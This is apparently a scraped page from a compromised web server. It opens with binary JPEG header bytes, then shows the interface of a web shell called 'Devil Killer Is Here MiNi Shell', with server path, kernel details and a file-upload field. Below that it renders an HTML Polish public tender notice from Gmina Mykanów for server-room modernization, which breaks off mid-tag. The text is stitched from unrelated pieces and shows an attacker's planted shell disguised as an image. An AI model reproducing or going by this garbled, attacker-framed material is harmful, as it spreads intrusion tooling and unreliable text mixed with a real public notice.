JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241216/0065528601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Modernizacja serwerowni oraz wdrożenie systemu tworzenia kopii zapasowych w Urzędzie Gminy Mykanów w ramach<br/>projektu pn. &#34;Cyberbezpieczeństwo Gminy Mykanów&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mykanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398110</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Samorządowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mykanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mykanow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mykanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja serwerowni oraz wdrożenie systemu tworzenia kopii zapasowych w Urzędzie Gminy Mykanów w ramach<br/>projektu pn. &#34;Cyberbezpieczeństwo Gminy Mykanów&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6de5ed5d-f342-4ad9-836c-2bdb2487ec2d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00655286</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00022571/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Modernizacja serwerowni w ramach projektu Cyberbezpieczeństwo Gminy Mykanów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> grant o numerze FERC.02.02-CS.01-001/23/2375/ FERC.02.02-CS.01-001/23/2024 w ramach Funduszy Europejskich na Rozwój Cyfrowy 2021-2027 (FERC) Priorytet II: Zaawansowane usługi cyfrowe Działanie 2.2. – Wzmocnienie krajowego systemu cyberbezpieczeństwa konkurs grantowy w ramach Projektu grantowego „Cyberbezpieczny Samorząd” o numerze FERC.02.02-CS.01-001/23 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mykanow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/mykanow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim za pośrednictwem https://platformazakupowa.pl/ pod adresem:<br/>https://platformazakupowa.pl/pn/mykanow/proceedings Zamawiający informuje, że instrukcje korzystania<br/>https://platformazakupowa.pl/ dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert<br/>oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu https://platformazakupowa.pl/ znajdują się w<br/>zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>4)Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/ do<br/>konkretnego wykonawcy.<br/>7) Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na<br/>https://platformazakupowa.pl/ ,tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 104, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na https://platformazakupowa.pl/ odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>11) Zamawiający wymaga, by formaty dokumentów sporządzanych przez Wykonawcę były zgodne z załącznikiem nr 2 do<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i<br/>wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych i jednocześnie<br/>rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>12) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>a) .zip<br/>b) .7Z<br/>13) Wśród formatów powszechnych a NIE występujących w rozporządzeniu<br/>występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>14) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz<br/>na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max<br/>5MB. 15) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w<br/>miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym<br/>PadES.<br/>16) Pliki w innych formatach niż PDF zaleca się opatrzyć ewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z<br/>podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>19) Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość<br/>do zamawiającego”, nie za pośrednictwem adresu email.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy w Mykanowie jest Wójt Gminy Mykanów z<br/>siedzibą: ul. Samorządowa 1, 42‑233 Mykanów;<br/>2) we wszystkich sprawach związanych z przetwarzaniem udostępnionych danych osobowych może się Pani/Pan kontaktować z<br/>Inspektorem Ochrony Danych Gminy Mykanów pod adresem e‑mail: ewa.olejarz@mykanow.pl lub na adres siedziby Urzędu Gminy<br/>w Mykanowie ul. Samorządowa 1 42- 233 Mykanów;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie przetargu nieograniczonego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>Prawo zamówień publicznych (dalej ustawy Pzp) oraz podmioty uprawnione do ich przetwarzania na podstawie przepisów prawa;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy. Dane będą następnie przechowywane w celach archiwalnych, przez okres, który wyznaczony zostanie przede<br/>wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych<br/>wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, chyba, że przepisy szczególne<br/>stanowią inaczej;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany i nie będą<br/>profilowane;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10) Obowiązek informacyjny określony przepisami RODO spoczywa także na Wykonawcach, którzy pozyskują dane osobowe osób<br/>trzecich w celu przekazania ich Zamawiającemu w ofertach. Dla uzyskania przez Zamawiającego potwierdzenia, że osoby, których<br/>dane osobowe są przekazywane Zamawiającemu, dysponują już wskazanymi informacjami, jak również w celu właściwego<br/>zabezpieczenia i ochrony danych tych osób, z których Wykonawca będzie korzystał, przekazanych przez Wykonawcę w ofercie<br/>celem uzyskania przedmiotowego zamówienia publicznego wymagane jest oświadczenie Wykonawcy dotyczące pozyskania przez<br/>Wykonawcę danych osobowych od osób trzecich, które zawarte jest w formularzu oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.271.19.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje:<br/>1) Serwery do wirtualizacji – 2 sztuki<br/>2) Serwerowy system operacyjny (SSO)<br/>3) Macierz dyskowa - 1 sztuka-<br/>4) Oprogramowanie do Backupu wraz ze wsparciem technicznym na okres 12 miesięcy<br/>5) Przełącznik sieciowy – 1 sztuka<br/>6) Wdrożenie<br/>Szczegółowy zakres oraz parametry zostały określone w szczegółowym opisie przedmiotu<br/>zamówienia, który stanowi załącznik nr 1 do SWZ<br/>Wykonawcy przed złożeniem oferty zobowiązany jest do zapoznania się i weryfikacji załączonych do SWZ załączników ,<br/>gdzie zostały określone wymagane parametry przedmiotu zamówienia.<br/>Zamawiający wymaga 36 miesięcznej gwarancji dla:<br/>1) Serwerów do wirtualizacji – 2 sztuki<br/>2) Macierzy dyskowej - 1 sztuka<br/>UWAGA!!!!<br/>Okres gwarancji jest jednym z kryteriów wyboru.<br/>4.Całość dostarczanego sprzętu i oprogramowania musi pochodzić z autoryzowanego kanału sprzedaży producentów z<br/>obszaru Unii Europejskiej,<br/>Niedopuszczalne są produkty prototypowe, nie dopuszcza się urządzeń długotrwale magazynowanych oraz pochodzących z<br/>programów wyprzedażowych producenta. Urządzenia nie mogą się znajdować się na liście „end-of-sale” oraz „end-ofsupport”<br/>producenta.<br/>5.Zamawiający wymaga, by dostarczone urządzenia były nowe (tzn. wyprodukowane nie dawniej, niż na 6 miesięcy przed<br/>ich dostarczeniem) oraz by nie były używane (przy czym Zamawiający dopuszcza, by urządzenia były rozpakowane i<br/>uruchomione przed ich dostarczeniem wyłącznie przez Wykonawcę i wyłącznie w celu weryfikacji działania urządzenia, przy<br/>czym jest zobowiązany do poinformowania Zamawiającego o zamiarze rozpakowania sprzętu, a Zamawiający ma prawo<br/>inspekcji sprzętu przed jego rozpakowaniem);<br/>6.Przedmiot zamówienia obejmuje również swoim zakresem: - dostawę z transportem, rozładunek, wniesienie w miejsce<br/>wskazane przez zamawiającego (na ryzyko i odpowiedzialność wykonawcy). Miejsce dostawy: Urząd Gminy w Mykanowie<br/>ul. Samorządowa 1; 4-233 Mykanów<br/>7.Parametry i wymagania wskazane w OPZ określają minimalne warunki techniczne, eksploatacyjne, użytkowe, jakościowe<br/>i funkcjonalne, jakie ma spełniać dostarczony Zamawiającemu przedmiot zamówienia.<br/>9. Oferowane dostawy muszą odpowiadać wymaganiom Zamawiającego oraz zostać wykonane zgodnie z wszelkimi<br/>obowiązującymi aktami prawnymi, właściwymi w przedmiocie zamówienia i na warunkach zawartych we Wzorze umowy,<br/>stanowiącym załącznik nr 5 do SWZ.<br/>10. Zgodnie z art. 101 ust. 4 ustawy Zamawiający dopuszcza rozwiązania równoważne. Jeżeli dokumentacja wskazywałaby<br/>w odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie – zamawiający, zgodnie z<br/>art. 99 ust. 5 ustawy Pzp, dopuszcza oferowanie materiałów lub urządzeń równoważnych. Materiały lub urządzenia<br/>pochodzące od konkretnych producentów określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą<br/>odpowiadać materiały lub urządzenia oferowane przez wykonawcę, aby zostały spełnione wymagania stawiane przez<br/>zamawiającego. Materiały lub urządzenia pochodzące od konkretnych producentów stanowią wyłącznie wzorzec jakościowy<br/>przedmiotu zamówienia. Pod pojęciem „minimalne parametry jakościowe i cechy użytkowe” zamawiający rozumie<br/>wymagania dotyczące materiałów lub urządzeń zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych<br/>producentów. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie poziomu oczekiwań<br/>zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami producentów/produktów ma wyłącznie<br/>charakter przykładowy. Zamawiający, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt przy<br/>opisie przedmiotu zamówienia, dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i cechach<br/>użytkowych co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych<br/>lub lepszych parametrach.<br/>11. Wykonawca ma obowiązek udowodnienia, iż proponowane rozwiązania w równoważnym stopniu spełniają wymagania<br/>określone w opisie przedmiotu zamówienia. Ciężar udowodnienia, że materiał lub produkt jest równoważny w stosunku do<br/>wymogu określonego przez Zamawiającego spoczywa na Wykonawcy. Jeżeli materiały lub produkty lub urządzenia<br/>zaoferowane przez Wykonawcę jako równoważne nie będą równoważne do określonych w OPZ, w świetle przedłożonych<br/>przez Wykonawcę dokumentów, oferta tego Wykonawcy zostanie odrzucona jako niezgodna z warunkami zamówienia.<br/>12.Wykonawca ponosi odpowiedzialność za jakość dostarczonego przedmiotu zamówienia w całości oraz zastosowanych<br/>materiałów.<br/>13. Wykonawca ponosi pełna odpowiedzialność za wykonanie wszystkich świadczeń stanowiących przedmiot zamówienia<br/>oraz za osoby lub podmioty, z których pomocą Wykonawca swe obowiązki wykonuje lub którym powierza ich wykonanie.<br/>14.Przedmiot zamówienia nie obejmuje wymagań w zakresie dostępności dla osób niepełnosprawnych oraz z<br/>przeznaczeniem dla wszystkich użytkowników. Dostawy będące przedmiotem zamówienia nie jest zamówieniem dla osób<br/>fizycznych a stanowią odpowiedź na zapotrzebowanie Zamawiającego który nie wskazuje szczególnych potrzeb w zakresie<br/>dostępności dla osób niepełnosprawnych. Wobec powyższego odstępuje się od uwzględnienia wymagań w zakresie<br/>dostępności dla osób niepełnosprawnych, zgodnie z art. 100 ustawy Pzp.<br/>15.Zamawiający nie dopuszcza możliwości roszczeń Wykonawcy z tytułu błędnego oszacowania ceny lub pominięcia<br/>kosztów i innych czynników mających lub mogących mieć wpływ na cenę.<br/>16. Zamawiający nie wymaga ani przeprowadzenia wizji lokalnej, ani sprawdzenia dokumentów niezbędnych do realizacji<br/>zamówienia dostępnych na miejscu u zamawiającego.<br/>17. Zamawiający wymaga w niniejszym postępowaniu złożenia przez Wykonawcę przedmiotowych środków dowodowych<br/>wraz z ofertą oraz wykazu oferowanego sprzętu i usługi w celu potwierdzenia spełniania określonych parametrów, cech lub<br/>innych wymogów określonych w opisie przedmiotu zamówienia. Zamawiający nie dopuszcza ich uzupełnienia! Informacje o przedmiotowych środkach dowodowych zawarte są w Rozdziale XII pkt. 11 SWZ.<br/>18. Wymagania w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95<br/>Na podstawie art. 95 ust.1 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę, Podwykonawcę lub dalszego<br/>podwykonawcę osób wykonujących wszelkie czynności wchodzące w tzw. koszty bezpośrednie na podstawie umowy o<br/>pracę. Wymóg ten dotyczy osób, które wykonują czynności bezpośrednio związane z wykonywaniem usługi w zakresie<br/>instalacji i konfigurowanie elementów systemów, kopii zapasowych oraz innych niezbędnych do wykonania zamówienia .<br/>Obowiązek zatrudnienia na podstawie umowy o pracę nie dotyczy sytuacji, w której wykonawca, podwykonawca lub dalszy<br/>podwykonawca osobiście wykonuje powyższe czynności..<br/>W związku z powyższym wykonawca musi przed rozpoczęciem wykonywania czynności przez te osoby przedstawić<br/>Zamawiającemu dokumenty potwierdzające zatrudnienie tych osób na umowę o pracę. Zgodnie z art. 438 ust. 2 pkt. 1<br/>ustawy Pzp mogą to być w szczególności:<br/>1) oświadczenia zatrudnionego pracownika lub<br/>2) oświadczenia wykonawcy lub podwykonawcy o zatrudnieniu pracownika na podstawie umowy o pracę lub<br/>3) poświadczonej za zgodność z oryginałem kopii umowy o pracę zatrudnionego pracownika lub<br/>4) inne dokumenty zawierające informacje, w tym dane osobowe, niezbędne do weryfikacji zatrud-nienia na podstawie umowy o pracę, w szczególności imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy o pracę i zakres obowiązków pracownika.<br/>Pracodawcą osób zatrudnionych na umowę o pracę musi być wykonawca lub jeden ze wspólników konsorcjum, zgłoszony zgodnie z przepisami ustawy Pzp, podwykonawca lub dalszy podwykonawca Bez przedstawienia Zamawiającemu jednego z dokumentów, o których mowa powyżej– osoby, które muszą być zatrudnione na umowę o pracę - nie będą mogły<br/>wykonywać pracy z winy wyko-nawcy. Jeżeli z naruszeniem powyższych wymogów roboty budowlane będzie dokonywać osoba nie zatrudniona na umowę o pracę co zostanie ustalone przez zamawiającego lub jego przedstawicie-li, osoba taka będzie musiała opuścić teren budowy, a wykonawca zapłaci zamawiającemu kary umowne zgodnie z postanowieniami<br/>umowy. Sposób weryfikacji zatrudnienia tych osób, uprawnienia Zamawiającego w zakresie kontroli spełnia-nia przez Wykonawcę<br/>wymagań związanych z zatrudnieniem tych osób oraz sankcji z tytułu nie-spełnienia tych wymagań zawarto we wzorze<br/>umowy – załącznik nr 5 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48821000-9 - Serwery sieciowe</p> <p class="mb-0">30234500-3 - Pamięci do przechowywania danych</p> <p class="mb-0">48219400-0 - Pakiety oprogramowania do serwera transakcji</p> <p 